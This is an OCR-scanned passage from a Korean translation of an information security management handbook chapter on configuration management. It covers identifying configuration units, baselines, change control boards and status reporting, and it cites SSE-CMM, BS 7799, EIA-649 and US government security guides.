콤퓨터보안기초. 이 참고서에 서 는 어떤 한 체계 의 생 명 주기 전기간에 걸 치 는 CM 을 위 
하여서는 수동추적체 계도 리용될수 있다고 밝히 고 있다. CM 실행과 관련한 방책들은 다 
음과 갈다. 

• 매 구성항목에 대 하여 고유식 별 자를 불일 것 

• CMP 를 세울것 

• 구성항목에 서 나타나는 변화(직 결 이 든 오프라인 이 든)들을 전부 기 록할것 

• 구성 통제위 원회 ( CCB ) 를 설 립할것 

EIA -649. 구성식별은 고유한 제품의 식별，정의，확인의 기초이며 제품과 문건의 식 
별표식，변화관리，책임성관계의 기초이기도 하다. 이 공정에서는 사용자가 제품관본들을 
구별하게 하며 기준선관리를 위 한 문건의 출하를 통제 한다. 

정보체계보안공학편람. CM 은 하나의 체계(쏘프트웨어，하드웨 어，펌 웨어，문건，지 원/ 
시 험설비，개 발/유지보수도구)에서 일 어 나는 모든 변화들을 조종통제하는 공정 이 
다. CCB 를 구성하며 그 체계 에서 일어 난 일체 변화를 검토하고 승인하여 야 한다. 정보 
체 계의 생 명 주기전반에 걸쳐 CM 을 진행하여 야 할 리유들은 다음과 같다. 

• 체계생명주기의 소여지점에서의 기준선을 유지하는것 

• 시 간에 따르는 체 계 들의 자연적발전(체 계 들은 정 적 으로 존재하지 않는다) 

• 재해(자연재해와 인적재해)에 대처한 비상계획작성 

• 모든 확인 및 보증증거들을 다 장악하는것 

• 체 계의 생 명 주기전반에 걸쳐 체 계의 무한한 자원의 사용은 증가할것 이 다. 

• 구성 항목식 별 

• 구성조종 및 통제 

• 구성 회계 

• 구성 검 사 

NCSC - TG -006, 신릐성체계의 구성관리에 대한 리해안내. CCB 를 통하여 CM 공정을 도 

모하는 CMP 와 인적 자원도 역시 《 도구》로 간주되 여 야 한다. CM 이 잘되 자면 개 발계 획 
의 착수직 후에 주도세 밀 한 계 획 안들을 작성하여 야 한다. CMP 에 는 체 계의 CM 을 실행하 
자면 무엇을 해야 하는가 하는것이 간단명료하게 서술되여 있어야 한다. 이 CMP 에는 




CCM 참가성원들의 역할도 명시되여야 한다. 체계와 관련된 모든 사람들의 책임분담이 
CMP 에 명백히 세워 지고 명문화되여야 CM 과정에 인적요인의 역할을 정확히 추동할수 
있다. CMP 의 한 부분에는 또한 필요한 절차들이 명시되여야 하며 일상적 인 CM 절차들과 
현존《 비상》절차들도 포함되 여 야 한다. CMP 는 실천을 위한 산 문건이므로 여기 에는 
추가와 변화가 있을수 있으나 세심히 평가하고 승인한 다음 실행함으로써 정확한 담보를 
마련해야 할것이다. 

CM 에 사용되는 그 어떤 도구도 CMP 에 정확히 문건화되여 야 한다. 이 도구들 
은 《엄격한 구성통제하에 보존》되여야 한다. 이 도구들에는 변화통제에 쓰이는 
양식 들，구성항목명명 관계 , 쏘프트웨 어라이 브러 리 와 모든 자동화된 도구들을 포함한 
다. 보고에 리용되 는 모든 문건표본들도 역 시 CMP 에 해 설서 를 첨 부하여 포함시켜 
야 한다. 

정보체계보안공학편람, 국가안전보장국, 중앙안전보장부. CM 공정 이 있어 해 당한 승 

인도 없이 보안위험을 증대시킬수 있는 수정현상들을 미리 막도록 하는것은 체계가 
동후 체계의 생명주기，증명/인가，재증명/재인가 활동들에서 고려해야 할 하나의 문 
제 이 다. 


구성단우 I 들들 식별하라 

표 26—4와 표 26—5를 보라. 

표 26-4 BP .13.02 -구성단? I 들을 식별하라 


해설 

구성단위 란 기준선에 함께 놓이는 하나 혹은 그이상의 작업결과(혹은 작업제 
품)를 말한다. CM 을 위한 작업 결 과의 선정 은 선정 된 CM 전 략에 밝혀 진 기 준사항 
에 기 초하여 야 한다. 구성단위 들은 개 발자와 고객 들에 게 리 득을 줄수 있는 수준에 
서 선정되여야 하지만 결코 개발자에게 불필요한 행정적부담으로는 되지 말아야 
한다. 


작업결과의 례 

• 기 준선에 놓이 는 작업결과구성 

• 식별된 구성단위들 

설명 

현지교체의 요구사항을 가전 체계의 구성단위들은 하나의 해당 구성단위를 
현지교체단위준위 에 두고 있 어 야 한다. 


SSE - CMM , 제 2.0 판，1999년 4월 1일，215페지 
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AR 25-3, 륙군정보체계생명주기관리. CM 은 4 가지분야 즉 구성식별，구성조종，구성상 
태계 산，구성 검 토에 기 본을 둔다. CM 은 구성항목들의 생 명 주기 전반에 걸 쳐 진행 되 여 야 
정보체계의 신뢰도를 통제 및 개선할수 있다. 

영국국가표준 ( BS 7799), 정보보안관리, 제 1 부, 정보보안관리체계의 실천조례. 변화조종 
의 결여는《체계 혹은 보안 실패의 공통적인 원인》이라고 한다. 변화조종에 대한 공식 
적인 관리와 실천은 설비，쏘프트웨어 혹은 절차들에 절실히 필요하다. 

콤퓨터보안기초. CM 항목들에도 문건들과 시 험계 획，기 타 보안관련체계 도구들과 시설 
들이 포함될수 있다. 

표 26 — 5 구성단위들의 실례 


다음의 구성 단위실례들은 《BP.0.02_ 보안구성을 관리 하라》에서 인용하였음 

• 모든 쏘프트웨어갱신정보의 기록들: 사용허가，계렬번호，모든 쏘프트웨어와 그 갱신판의 
령수증(날자，책임진 사람，변화에 대 한 설명)을 기록한다. 

• 배 포와 관련한 모든 문제 의 기 록: 쏘프트웨 어배포과정 에 제 기된 문제 와 그 해결여부를 
기술한다. 

• 체 계보안구성 : 체 계하드웨 어，쏘프트웨어와 통신의 현상래(그것들의 위 치，담당자，관련정 
보 봄을 포함함)를 기술한다. 

• 체 계보안구성변화: 변화를 가져 온 사람의 이 름，변화에 대 한 해석，변화의 리유，변화날 
자와 시간 등 체계보안구성변화에 대하여 기술한다. 

• 확증된 모든 쏘프트웨 어갱 신정보의 기 록: 변화에 대 한 해설，변화시 킨 사람이 름, 변화날 
자 등 모든 쏘프트웨 어갱 신정 보를 기 록한다. 

• 신뢰 쏘프트웨 어배 포에 대 한 주기 적 인 개 괄: 최 근에 진행한 신뢰 성쏘프트웨어 의 배 포정 형 
은 난점과 그 해결과정까지 서술한다. 

• 요구사항에 대 한 보안상변화: 보안상리유 혹은 보안에 주는 영 향으로 하여 제 기되는 체 
계요구사항에 서 의 변화를 추적 함으로써 변화와 그 결 과가 의 도적 인것 으로 되 게 한다. 

• 설계문건에서의 보안상변화: 보안상 혹은 보안에 주는 영향으로 하여 제기되는 체계설계 
에서의 변화를 추적함으로써 변화와 그 결과가 의도적인것으로 되게 한다. 

• 조종실현: 구성세부를 포함하여 체 계내의 보안조종실현을 서술한다. 

• 보안후열: 계획된 조종실현과의 관계에서 체계보안조종의 현상래를 서술한다. 

• 통제수단의 폐기: 보안통제수단폐기나 기능정지절차를 과도적인 계획까지 포함하여 설명 
한다. 


SSE - CMM , 제 2.0 판，1999년 4월 1일，115〜116폐지 

DOD - STD -2167 A , 방위체계쏘프트웨어의 개발. 이 군부표준은 폐기된지 오래되였지만 
구성식별단위들은 많은 체계개 발자들에게 익숙된 개념 이다. 그 단위들은 콤퓨터쏘프트웨 






어 구성 항목 ( CSCI ) 들과 그에 해 당하는 콤퓨터 쏘프트웨 어 의 구성 요소 ( CSC ) 들과 를퓨터 쏘프 
트웨어 의 단위 들 ( CSU ) 이 다. 문건은 기 능적 기 준선，할당기 준선，제 품기 준선들을 설정하였 
다. 인도가능한 매 항목들에는 하나의 판본명，출하，변화상태，기타 식별세부가 있었다. 
구성통제는 문건화된 기성계 획에 따라 실행되 였으며 구성상태통계 실현을 통하여 중지되 
였 다. 

EIA -649 고유식별자가 있으므로 해당 단위에 관한 공정，날자，사건，시험，문건들의 
호상관계를 명백히 알수 있다. 문건까지도 고유식별자를 붙여 정확한 제품구성과 련관을 
맺도록 하여 야 한다. 

기준선이란 알려 진 구성에서의 그 어떤 시간점에서 제품에 대한 합의된 해설을 의 
미한다. 복잡한 제 품들에 한해서 는 중간기 준선도 설정 될수 있다. 기 준선은 하나의 도구로 
서 변경 에 대 한 승인을 받기 위하여 당국과의 일 치성을 맞추는데 필요하다. 기준선에는 
요구사항，설 계 안，제 품구성，운영 단계 기 준선，페 기 단계 기 준선들이 있 다. 

《정보분류: 기업실현의 지침》, 정보보안관리편람 어떤 일을 누가 수행할것 인가. 구 
체화한 작업요구서와 같은 쏘프트웨어변화사항들을 기록한 검열/력사정보들과 기업에 필 
요한 기 타 해 당 문건들을 보존하는것은 사활적 인 쏘프트웨 어통계수단이 다. 

사업결과들의 기준선들들 보존하라 


표 26—6을 볼것. 

표 26-6 BP 13.03 -사업결과물기준선들을 보존할것 


이 실천사업에서는 사업결과물구성에 대한 종합정보를 구축하고 보전하며 …자료 
를 수집하거 나 기준선추가，삭제，수정 에 대한 이룩된 절차와 함께 구성자료의 추적/감 
시，검열 및 통계절차를 포함한 구성단위들을 묘사함으로써 체계생명주기의 임의의 지 
점에서 검열흔적을 원천문건들에 다시 제공한다. 


사업결과물의 례 

• 결심자료기지 

• 기준선화된 구성 

• 추적 성회 로망 

설명 

해당 문건들에 갱신과 변경을 쉽게 하기 위하여 구성자료들은 전자적인 형식으로 
보존될수 있다. 
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EIA -649. 구성의 기준선복구(혹은 해당문건없이 새로 만드는것)는 품이 많이 들며 
자금이 많이 든다. 설계정보와 성능정보가 없는 경우 사찰을 통하여 구성을 확정해야 하 
는데 이것은 운영 및 유지보수결정에 영향을 준다. 거꾸로 일을 하면 그 공정에는 자금 
이 매우 많이 든다. 

《정보분류: 기업실현의 지침》, 정보보안관리편람 이 장은《갱신검사를 받았거나 집 
합서고나 생산서고에 적재되여 있는 쏘프트웨어판본》들을 비롯한 관본통제와 구성통제 
의 중요성을 강조하고 있다. 《이러한 통제에는 이러한 사업과 관련된 오유보고감시와 
해당 교정행동을 취하는것이 포함된다.》 

새 련합공동모형 ( NAPM ). NAPM 은 하나의 공동모형 으로서 보안기 능，구성관리 기 능， 
품질담보기 능을 전반적 인 자동정 보체 계 ( AIS ) 보안공학공정 과 결 합시 켜 준다. NAPM 은 기 
관의 AIS 와 효률적인 보안프로그람의 실현에서 CM 이 얼마나 중요한가를 깊이 깨닫게 
한다. 


CM 은 현존 AIS 에 대한 변화는 식별과 통제가 가능한 환경에서 진행되며 이 변화들은 
안전한 제 품, 체 계，봉사의 무결성 이 나 리용성속성 에 부정적영 향을 주지 않는다는 담보를 가 
지고 관리를 제공한다. CM 은 체계에 가해진 모든 추가，삭제，변경이 그 체계의 무결성，리용 
성，비 밀 성 을 손상시키 지 않는다는 보충적 인 보안담보준위 들도 제 공한다. CM 은 절 차화와 편 
견없는 검증을 통하여 실현됨으로써 AIS 와 혹은 모든 해당문건들이 식별, 변화통제, 상래통계， 
검열이라는 4가지 구성요소를 중시하면서 정확히 갱신되도록 한다. 

설정된 구성단위들에 대한 변화를 틍제하라 

표 26-7 을 볼것. 

다른 보안참고서들과의 관계 

영국국가표준 ( BS 7799), 정보보안관리, 제1부, 정보보안관리체계의 실천조례 변화의 잠 

재적인 영향，제 안된 변경의 승인절차준수，비성공적 인 변화의 중지 및 회복절차 등을 분 
석 평 가하는것 은 운영적 변경 공정 에서 중요한 의의를 가진다. 쏘프트웨 어통제 를 지 원하며 
운영 적 체 계 파손의 위험을 줄일수 있는 방책들과 절 차블은 다음과 갈다. 


IT 승인을 받은 임 명된 서 고관리 자에 의한 프로그람서고갱 신 
비실행형규정의 제외 

새 국정에 대한 심도 있는 검사와 사용자접수 



표 26-7 


BP .13.04 설정된 구성단위들에 대한 변화를 ■제하라 


해설 

기준선작업결과물의 구성에 대한 통제를 유지한다. 여기에는 매 구성단위의 구성 
에 대한 추적，가능한 새로운 구성의 승인，기준선갱신들이 속한다 .작업결과물에서 발 
견된 문제점들이나 작업결과물을 변경시키기 위한 요청을 분석하여 그 변경이 작업결 
과물, 프로그람시간표，원가와 기타 작업결과물에 미칠수 있는 영향을 판정한다. 만일 
그 분석에 기초하여 작업결과물에 대한 변경안이 승인되면 그 변화를 작업결과물과 기 
타 유관분야에 결합시키기 위한 시간표가 작성된다. 변경된 구성단위들은 후열과 술인 
을 거쳐 출하된다. 변경사항들은 출하되기전까지는 공식성을 띠지 않는다. 


작업결과물의 실례 

새로운 작업결과기준선들 


설명 

변경통제조치들은 변경사항의 부류에 맞게 조절되여야 한다. 실례로 다른 구 
성요소들에 영향을 주지 않는 구성요소의 변경에 대한 승인공정은 보다 간단할수 
i 다. 


SSE^CMM, 제 2.0 판，1999년 4월 1일’ 217폐지 

• 프로그람원천서고갱신 

• 모든 운영용 프로그람서고들에 대 한 갱 신검 열기 록의 보존 

• 비상사고에 대처한 쏘프트웨어의 이전 판본들의 보유 

영국국가표준 ( BS 7799) 정보보안관리 제2부 정보보안관리체계의 기술설명서 . 공식 적 인 

변경통제절차들은 체계의 생명주기전반과정에 걸쳐 실행되여야 하며 그 변화들은 엄격히 
통제되여 야 한다. 

EIA -649 

변화관리를 위한 초기기준선에는 수행활동(즉 제품개발자와 제품공급자의)이 만족시 
키기로 합의한 요구사항들을 규제하는 구성문건이 포함되여 있다. 변화관리를 위한 설계 
출하기준선에는 제품의 제작，건설，구축 및 코드화에 리용되는 세부설계문건들이 포함되 
여 있다. 변화관리를 위한 제품구성기준선에는 제품의 요구사항에 대한 제품구성을 규제 
하는 설계 출하기준선으로부터 나온 세부설계 문건들이 포함되여 있다. 제품구성은 성숙구 
성으로 간주된다. 

현 요구사항들，설계출하기준선이나 제품구성기준선에 대한 변화들은 어떤 문제가 발견 
되였거나 제품개선이나 향상이 제기되였거나 고객의 요구가 있다거나 시장이나 공공법률에 
의하여 불가피하게 된 조건이 있는 경우에 생기게 된다. 
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변화들은 후열과 승인을 위한 해당 수준을 결정하는데 편리하게 주요변화와 부차적인 
변화로 분류되여 야 한다. 주요변화란 큰 영향을 가지는 기준선화된 구성문건들의 요구사항(요 
구사항，설계출하기준선 혹은 제품구성기준선)들에 대한 변화를 말한다. 이 주요변화는 해당 
한 모든 기능그룹이나 생산품개발림의 협조와 검토를 받아야 하며 해당 승인당국의 승인을 
받아야 한다. …부차적인 변화는 구성문건(출하된 설계정보)에 공정들이나 부분적인 곳에 수 
정 혹은 변경시키는것이나 고객의 요구에는 …영향을 주지 않는 그러한 변화를 의미한다. 변 
화청구를 정확히 평가하자면 변화에 대한 청구내용이 문건에 명확히 반영되여야 한다. 부차 
적 인 변화까지 정밀하게 기 입하여 예견하지 않았던 우발사래나 예상치 않았던 제품사고가 나 
는 경우 검열흔적이 구축되게끔 하여야 한다. 정확하게 접근할수 있는 기록들을 가짐으로써 
이 러 한 사래 에 드는 연구비 용을 절 약하는것 은 부지 런히 질서 있게 변화처 리 한것 을 충분히 상 
쇄하고도 남음이 있을수 있다. 

청구된 변화가 줄수 있는 기술적，자원적，시간표적 및 원가적인 영향도 반드시 먼저 
고려해 본 다음에 승인을 받고 실행해야 한다. 그 변화의 영향을 받거나 그 변화실행에 
책임이 있는 부문별 기관들도 이 변화공정에 참가하여야 한다. 이 부문별기관들은 변화의 
성과적인 실행에 영향을 줄수 있는 중요한 정보(다른 기관들은 가지고 있지 못하는)를 
가지고 있을수 있다. 변화에 대한 고려항목에는 일차적인 의뢰기관의 요구사항들(례하면 
지원쏘프트웨어，부속품 혹은 수리부속 등이 있는가，운영보수지시사항에 수행된 내용은 
없는가 등)은 물론 지원기관들의 시간상 및 자원상 요구사항들과 변화의 긴박성문제도 
포함되여 있어야 한다. 검증실행범위는 변화된 단위들의 량과 실행된 변화의 형태에 따 
라 다를것이다. 변화에 대한 검증기록과 필요한 지원기능들의 실행기록들이 반드시 보존 
되여야 한다. 해당구성에 대한 변경내용들은 반드시 승인을 받아야 하며 문건화되여야 
한다. 

FIPS PUB 102, 콤퓨터보안승인과 인가를 위한 지도서. 변화통제공정은 암시적형태의 

재승인이며 재 인가이 다. 이 공정은 개 발공정과 운영공정 에서 다 필요하다. 기밀응용시 변 
화통제 는 요구사항，설계， 프로 그람，절차적 문건들뿐아니 라 하드웨 어와 쏘 프트웨 어 자 체 에 
도 리용되여 야 한다. 

이 공정은 우에서 렬거된 제품들에 대한 기준선설정을 거처 개발과정에 시작된다. 
일단 기준선이 설정되면 모든 변화에는 공식적인 변경신청과 위임이 필요하다. 모든 변 
화는 이미 있은 승인근거문건에 미치는 그 영향관계가 검토된다. 

이러한 변화통제를 주관하는 실체는 CCB 이다. 개발과정에 CCB 는 개발과제운영위원 
회나 그와 류사한 그룹의 보조실무그룹으로 된다. 개발이 완료되자마자 CCB 의 책임은 
대체로 운영 및 유지보수실에 이전된다. CCB 에는 다음과 같은 사항들을 책임진 보안대 
표가 있어 야 한다. 

• 해 당변화가 보안에 적 중한가를 결정한다. 

• 필요한 보안후열과 필요한 수준의 재승인，재 인가에 대 하여 결정 을 내린다. 

• 재 승인사업 을 하지 않으면 안되 게 하는 긴박한 요인을 결정한다. 

• 특별한 보안후열이 필요 없는 부차적인 변화같은것에 대하여 기술적인 보안평정 
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자의 역 할을 수행 한다. 

매우 기밀적인 분야에 한해서는 모든 변화에 대한 승인 및 검사제도를 세우는 
것이 필요하다. 비록 사소한 변화라고 할지라도 검사결과와 같은 해당 승인증명은 
물론 모든 변화요소를 전부 기록해 놓아야 한다. 이 기록은 재승인과정에 검토되게 
된 과'. 

그 어떤 체계나 그 환경변화, 재승인과 재인가의 보안상 특징들이 필요하게 되는 조건에 
서 … CM 은 이 변화를 감시하는데 가장 적중한 분야이다. 

정보체계보안공학편람 

체 계，부분체 계 혹은 구성 요소에서의 변화나 갱 신(례하면 새 로운 조작체 계출하판들의 통 
합，자료관리 응용프로그람의 수정，새 로운 상업적쏘프트웨 어 파케 트의 설 치，하드웨 어갱 신이 
나 교체，새로운 보안제품의 설치，《신뢰성》구성요소의 대면부특성의 변경 등) 은 … 그 보 
안적 전제 를 위 반하는것 으로 될 수 있 다. 가장 강력한 구성 통제절 차로서 는 실지 동작환경 에 서 
그 체계에 대한 물리적 및 #능적검열을 주기적으로 진행하는것이다. 그 절차는 문건들 또는 
알려 지거나 제기된 변경에 전적으로 의거하는것이 아니다. 잘 알려 지지 않았거나 문건기록 
이 잘 되지 않은 변화도 때때 로 제 기될수 있다. 이 변화들은 체 계의 하드웨 어，쏘프트웨어， 
상주자료에 대한 직접적인 사찰을 통해서만 검출할수 있다. 

NCSC - TG -006, 신릐성체계의 구성관리에 대한 지침. CM 은 체계의 생명주기전반에 걸 
쳐 그 체계에 대한 통제를 진행함으로써 운영되는 체계가 정확한 체계라는것을 담보하며 
정 확한 보안방책 을 실현한다.《 보증통제 목적 》 (Assurance Control Objective ) 은 구성 관리 에 
다음과 같이 적용될수 있다. 

기밀 혹은 극비정보를 처리보관하는 콤퓨터체계들#; .그 하드웨어와 쏘프트웨어에 의거 
하여 그 정보를 보호한다. 이로부터 그 하드웨어와 쏘프트웨어자체가 비법적인 변경으로부터 
보호되여야 그 보호장치들이 비정상가동이나 우회되지 않을수 있다는 결론이 나온다. 이렇 
게 되여야만 보안방책에 대한 하드웨어적 및 쏘프트웨어적인 실행이 정확하고 외곡없이 준수 
되고 있다는 신심이 생길수 있다. 

구성상태를 통보하라 


구성상태는 기관들의 사업의 성공에서 사활적이다(표 26-8 참조). 기관이 사용 
하는 정보는 정확하여야 한다. 《설계도가 잘못되였는데 집은 지어서 무슨 의의가 있 
는가》하는 격이 될수 있다. 모든 변화들을 신속하게 일관하게 문서화하고 통보해야 
한다. 
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표 26-8 


BP . 13.05 구성상태를 롬보하라 


해설 

상태변화가 있는 경우에는 언제든지 구성자료상태를 해당 그룹에 통지하라. 
상태보고서에는 접수된 구성단위변화들이 언제 처리되는가에 대한 정보，그 변화를 
받은 해당 작업결과물에 대한 정보를 반영하였다. 개발자와 고객들과 기 타 관계자 
들에게 구성자료와 구성상태에 대한 접근이 제공되여야 한다. 

작업결과들의 례 

상태 보고서 들 

설명 

구성 상태통보활동에 서 대 표적 인것 으로서 는 합법 적사용자들에 게 접 근권을 제 공 
하는것，합법적사용자들의 기준선복사본들을 임의의 시간에 볼수 있게 하는것이다. 


SSE - CMM , 제 2.0 판，1999년 4월 1일 218페지 

다른 보안참고서들과의 관계 

EIA -649. 제품에 대한 구성관리정보는 생명주기와 해당 CM 공정들(계획과 관리， 
식별，변화관리，검증과 검열)전반에서 중요하다. 《구성상태통계 ( CSA ) 는 이러한 조직 
화 된 수많은 정 보에 대 한 관점 들을 호상련결 시키 며 보관하며 보존하며 제 공한다. … 
CSA 는 제 품에 대 한 식 별，생 산，검 사，납입，운영，유지，수리，재장비능력 을 향상시 
킨다.》 CSA 는 또한 《 한 제 품에 대 한 력사적 인 구성자료원천과 모든 구성문건들을 
제공한다.》 

이 CSA 정보는 제품의 생명주기전반에 걸쳐 알아야 할 필요가 있는 사람들에게 널리 
알려 주어 야 한다. CSA 생 명 주기문건화의 단계 별 실 례 들은 다음과 같다. 

• 개념단계 요구사항문건들과 그 변화력사 

• 정의단계 세 부적 인 구성문건들(실례 들，기 술설명서，공학적 도안들，쏘프트웨 어 설 
계문건들，쏘프트웨어이름，시험계획과 절차)과 그 변화력사와 변경상태 

• 구축단계 보충적 인 제 품정 보(례하면 검 증된 구축상태 의 단위구성 )와 제 품변화들 
파 해당 변 량들 

• 분배단계 이 단계 의 정 보에 는 고객 들과 납입날자，설 치 설정，담보만기날자，봉사 
합의형 태와 만기날자가 포함된다. 

• 운영단계 제품의 형태에 따라 그리고 CM 책임분담과 관련한 계약합의에 따라 
CSA 는 달라 질수 있으나 보존된 상태의 제품구성，수정된 상태의 제품구성， 
운영 및 유지 보수정 보의 수정상태，변화요청 및 변화통보，제 한조치 등을 포 
함 한다. 
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• 페기단계 CSA 정 보는 제 품마다 다르며 제 품페 기 가 부정 적 영 향을 가지 는가 아닌 
가 혹은 특정자료의 보유와 관련된 법적 및 계 약적법조항이 있는가 없는가에 따 
라 다르다. 


《체계무결성공학》, 정보보안관리편람. 이 장은 사활적 인 체계준위의 정보를 기관에 
넘겨 주기 위한 구성관리계획이 중요성을 강조하고 있다. 분산된 체계의 CM 계획들은 다 
음의 비 용들을 문건에 반영하여 야 한다. 

• 자료교환의 전반적 체 계 조종을 위한 체 계 준위 및 싸이 트준위방책，표준，절 차，책 
임관계 및 요구사항들 

• 매 개 인의 싸이트구성 의 식 별 

• 공통의 자료，하드웨어，쏘프트웨어 

• 매 요소의 구성에 대한 유지보수 

공동의 자료와 응용프로그람의 판본을 확인하기 위한 분산조종과 검 열사업은 싸이 트 
준위 CM 계획들이 분산준위 CM 계획들에 종속되여 있는 분산된 체계의 전반에 걸쳐 곡 
같이 진행된다. 

변화통계당국(들)은 단일한 부서，국，단위 들에 의하여 관리되지 않는 분산된 체계 에 
대한 방책，기준，절차，역할, 책임관계，요구사항들에 한하여 모든 분산된 체계들과 일 
치를 이룩함 필요가 있을것이다. 

결 론 


변화는 불가피하다 

기관들에서의 변화는 불가피하다. 하나의 정보체계와 그 직접적환경，혹은 보다 넓은 
기 관적환경 에서의 변화들은 정보체계 의 보안상태 의 균형과 실행된 보안해 결책들에 영 향 
을 줄수 있으며 또 분명히 줄것이다. 보안에 큰 영향을 줄수 있는 정상적인 기업활동이 
나 사건들은 다음과 갈다. 

• 해당 보안상 필요나 대응책을 변경시키는 정보비밀성에서의 사명 및 방책적변화 

• 체 계보안위 험 을 증가 혹은 감소시키 는 위 협변화(례하면 잠재 적 공격 자의 위 협 동 
기나 새로운 위협능력들) 

• 각이한 보안방식 의 운영 을 요구하는 응용에 서 의 변화 

• 새 로운 보안상공격방식 의 발견 

• 보안허 점 의 발생 으로 하여 인가를 무효화시 킬수 있는 보안파괴，체 계 무결성파괴， 

비정상적 인 정황이 나 사고 
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• 보안상태에 대한 검사，사찰 혹은 외적인 평가 

• 체계구성，부분체계구성 혹은 요소구성에서의 변화나 질적갱신 

• 구성 항목의 제 거 나 품질 저 락 

• 체계공정대응책의 제거나 품질저락(즉 전반보안대안의 사람대면부요구조건 혹은 

기타 리론적/절차적구성요소들) 

• 그 어떤 새로운 외부적대면부와의 련결 

• 운영환경에서의 변화들(례하면 다른 설비나 장소에로의 재배치，하부시설이나 
환경이 제공하는 보호장치에서의 변화들，외부적인 운영절차에서의 변화들) 

• 보안상태를 개선하거나 운영비용을 줄일수 있는 새로운 대응기술의 리용가능성 

• 정보체계의 보안인가서의 기한완료 

변화는 ■제를 받아야 한다 

변화에 대한 통제라는 개념의 뒤에는 반드시 변화에 대한 사전승인이 있어야 하며 
그 다음에야 변화가 진행된다. 승인을 하자면 변화의 내적의미에 대한 분석이 있어야 한 
다. 일부 변화들은 정보체계의 보안상태에 부정적영향을 미칠수도 있다. 이미 세워진 계 
획에 따라 진행하는 CM 은 기관들에 여러가지 리익을 가져다 줄수 있는데 그것들은 다 
음과 갈다. 

• 완결된 변화효과에 대한 지식에 기초하여 결심채택할수 있다. 

• 변화가 필요한 대상이 나 실지 리 익을 주는 대상들에만 국한될수 있다. 

• 제안된 변화들에 대한 분석이 효과적이며 원가를 절약한다. 

• 제품정보나 제품구성에 대한 신뢰도가 높아 진다. 

• 변화에 대한 정보가 정연하게 통보된다. 

• 고객의 리익을 보전한다. 

• 체 계구성기 준선 이 추세 에 따라 간다. 

• 제 품대 면부에 대 한 구성조종을 할수 있 다. 

• 체계구성과 해당 문건들사이의 일치성이 보장된다. 

• 변화후 체 계유지 보수가 쉽다. 

변화통제 도 반드시 콤퓨터 시 설안에서 실행 되 여 야 한다. 매 개 콤퓨터시 설에 는 조작체 
계，콤퓨터설비，망，환경편의시설(례컨대 공기조화기，물，난방，배관시설，전기，경보장치 
등)과 응용프로그람들의 변화에 관한 방책이 있어야 한다. 

구성관리는 최상의 실천 


유럽보안연단은 수년간에 걸쳐 경제의 각 부문에 있는 회사들을 대상으로 체계적 인 
실례연구를 진행 하고 있다. 최 근의 한 연구에서는 분산환경 에서의 정보기술보안의 조직 
과 관리 문제 를 다투었다. 질문을 받은 각기 관들의 응답에 의하면 현재 리 용되 고 있는 체 





계들에 대한 변화관리는 보충적으로 연구할 가치가 있는 가장 중요한 보안실천사항에서 
6번째자리를 차지하였다. 비록 그 실천사항이 잘세워 졌으며 모든 응답자들(주로 IT 보안 
관리자， IT 관리자，기능부문의 담당자들임)의 견해에는 매우 중요한것으로 되지만 그들의 
의견을 종합하면 다음의 결론이 엄 어 진다. 

《실례들이 성공적인 경우도 있지만 변화관리는 제일 괜찮은 기관도 개선의 필요성 
을 느끼 는 그러한 분야였 다.》 

구성관리는 가치부가공정 

하나의 공정인 CM 이 있음으로 하여 기관들은 그 공정을 자기의 실정에 맞게 리 
용하여 실정과 환경을 다름으로써 그 공정에 실현되며 결과물에 가치가 부가되게끔 
한다. 

이 장을 집 필하면서 참고한 수많은 도서들에서 일관하게 강조한것 은 이 공정실행 에 
서 의 일 관성 과 이 공정 의 반복성 에 대 한 요구였 다. 수많은 활동들을 한두번 일 관성없 이 
실 행하는것 보다 몇 가지 공정 들을 일정한 기 간에 걸 쳐 일관성 있게 반복하는것 이 더 좋다. 
표준화가 진행되면 그 공정 이 차지하는 지위를 알게 된다. 그 공정의 지위 와 해 당 우점 
(과 약점 )을 알게 되 면 그 공정 과 그 공정 의 산품에 대 한 기 준선도 생길수 있 다. 구성관 
리 를 잘 실행해 나가면 능률, 신뢰도，유지보수도 개선되며 제 품의 수명도 길 어 지며 개 발 
원가가 적어 지며 위험과 손해부담도 덜어 지게 되며 부족점도 메꾸어 지게 된다. 최상 
적인 CM 실천에 형용사들을 불여 보자면 《계획적》，《통합적》，《일관적》，《규칙 
적》，《작업흐름선에 기초한》，《유연성 있는》，《계측적인》，《투명성 있는》등을 
붙일수 있다. 

CM 의 보안상 우월성은 예상치 않은 위협요소들과 악성사건들에 대하여 보호하는것 
이다. CM 은 제기된 변화들의 내부관계를 주의 깊게 분석하고 그 변화들을 승인한 다음 
에야 그것을 실행시켜야 한다. 또한 CM 은 필요한 경우(례를 들어 변화가 오유인 경우) 
원래구성상태에로 거꾸로 갈수 있는 능력도 가지고 있다(그것은 원래의 구성판들이 문서 
고에 보관되 기 때 문이 다). 일 단 검 토된 프로그람이 접 수되 면 프로그람작성 자는 변경 승인 
공정 을 거 치지 않고서 는 함정 문 ( trapdoor ) 을 끼 워 넣 는것 과 갈은 악성 변경 을 하지 못하게 
되여 있다. 

구성관리실행 

구성관리 실행 에서 보안전문가는 ; 

• 건전한 CM 방책 들에 기 초하여 CM 활동을 계 획하여 야 한다. 

• 환경 조건과 외 적 조건，산품의 생 명 주기，단계 들에 맞게끔 CM 공정 들을 선택하여 
야 한다. 

• 도구에는 간단한 수동도구，자동도구 혹은 량자를 결합한 도구도 있을수 있으므 
로 해 당 CM 공정 에 맞는 도구를 선택하여 야 한다. 
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• 개 발과제 와 전반적기 간에 걸 쳐 CM 활동들을 일 관성 있게 실 행하여 야 한다. 

• CM 계 획 안들을 리 용하여 해 당 인원들에 대 한 강습을 진행할수도 있 고 고객，품 
질보증인원，검열자들에게 간단히 설명도 해주어야 한다. 

• 기 업의 CM 을 리용하여 류사한 산품에 대 한 완전한 수행계 획들의 반복을 피 하 
여 야 한다. 

• 자원들이 그 과정에 제때에 도움이 되게끔 하여야 한다. 

• 보안전문가가 CCB 에 참가함으로써 제기된 변경의 보안상 내적관계가 평가되게 
끔 하여 야 한다. 

• 변경된 체계를 시험하며 승인을 받은 다음에 전개하도록 하여 야 한다. 

• 보조부문이나 봉사부문들이 이 변경과정에 도움을 즐수 있게 하여야 한다. 

• 구성정보를 체계적으로 기록하고 안전하게 보관하며 승인하여 배포하도록 하여 
야 한다. 

• 주기 적 인 검 열을 진행하여 체 계구성과 관련문건(종이 문서형식 이든 전자문서형식 
이든)들을 검토확인하여야 한다. 
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제 4 편 

응용 및 체계개발보안 


전통적으로 보면 보안통제가 강구되는 곳은 조작체계나 망전반이다. 그러나 무한 
량의 정보를 처리보관하는 기관 같은데서 정보에 대한 끝없는 요구가 제기됨으로 하여 
